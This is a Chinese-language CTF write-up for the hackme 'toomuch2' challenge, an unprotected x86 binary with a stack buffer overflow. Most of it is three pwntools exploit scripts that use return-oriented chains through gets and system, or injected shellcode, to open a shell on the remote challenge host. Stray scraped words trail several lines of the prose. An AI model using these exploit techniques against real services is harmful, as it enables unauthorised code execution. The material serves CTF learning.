hackme pwn toomuch2 [buffer overflow + ROPx86]
checksec一下,发现啥保护也没有,不须要再找libc的版本了python
这里的漏洞点在toomuch1中说过了shell
在toooomuch函数中,覆盖0x18+4个值,便可达到溢出效果函数
下一步目标是:将"/bin/sh"写入bss段中,而后执行system函数便可3d
相似x64平台,在x86中也有类似的通用gadgets调试
exp1:code
利用gets+system:blog
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))
pr = 0x804889B
system_plt = 0x080484C0
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
exp2:utf-8
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))
pr = 0x804889B
system = 0x8048649
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
分析一下:rem
exp1和exp2的不一样点:exp1中,调用的是system_plt,没有pop—ret指令,即没有返回地址,因此要本身构造get
exp2中,调用的是函数中的对system的调用,以后有pop和retn,即有恢复堆栈
单步调试便可看到区别
exp3:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
elf = ELF("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
gets = elf.symbols['gets']
bss = elf.bss()
log.info("gets addr = " + str(hex(gets)))
log.info("bss addr = " + str(hex(bss)))
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(bss) + p32(bss)
io.recvuntil("passcode: ")
io.sendline(payload)
io.sendline(asm(shellcraft.sh()))
io.interactive()